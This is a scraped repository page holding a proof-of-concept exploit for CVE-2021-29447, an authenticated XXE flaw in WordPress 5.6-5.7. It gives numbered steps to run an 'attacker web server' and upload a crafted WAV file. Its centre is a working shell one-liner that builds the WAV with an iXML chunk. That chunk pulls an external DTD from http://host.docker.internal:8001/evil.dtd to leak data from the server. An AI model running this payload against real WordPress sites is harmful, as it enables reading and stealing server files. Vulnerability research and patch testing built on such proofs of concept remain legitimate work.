CVE-2021-29447
CVE-2021-29447 copied to clipboard

Published 20 hours ago •

motikan2010

→

Metadata

WordPress - Authenticated XXE (CVE-2021-29447)

Readme
Issues

WordPress 5.6-5.7 - Authenticated (Author+) XXE (CVE-2021-29447)

Using

Step1. Run WordPress

$ make up-wp

Step2. Run Attacker web server

$ make up-mal

Step3. Generate malicious WAV file

Without wavefile npm (Recommend)

$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://host.docker.internal:8001/evil.dtd'"'"'>%remote;%init;%trick;] >\x00'> malicious.wav

With wavefile npm

$ make make-wav

Step4. Login to WordPress & Upload WAV file to New Media

Step5. decode

References

WordPress 5.6-5.7 - Authenticated XXE Within the Media Library Affecting PHP 8 Security Vulnerability

About

WordPress - Authenticated XXE (CVE-2021-29447)

29

Stars

9

Forks

Watchers

Owner

motikan2010

← Metadata

29

Stars

9

Forks

Watchers

Owner

motikan2010

Metadata

WordPress - Authenticated XXE (CVE-2021-29447)

Back

CVE-2021-29447 CVE-2021-29447 copied to clipboard

Metadata

WordPress 5.6-5.7 - Authenticated (Author+) XXE (CVE-2021-29447)

Using

Step1. Run WordPress

Step2. Run Attacker web server

Step3. Generate malicious WAV file

Without wavefile npm (Recommend)

With wavefile npm

Step4. Login to WordPress & Upload WAV file to New Media

Step5. decode

References

← Metadata

Owner

Metadata

CVE-2021-29447
CVE-2021-29447 copied to clipboard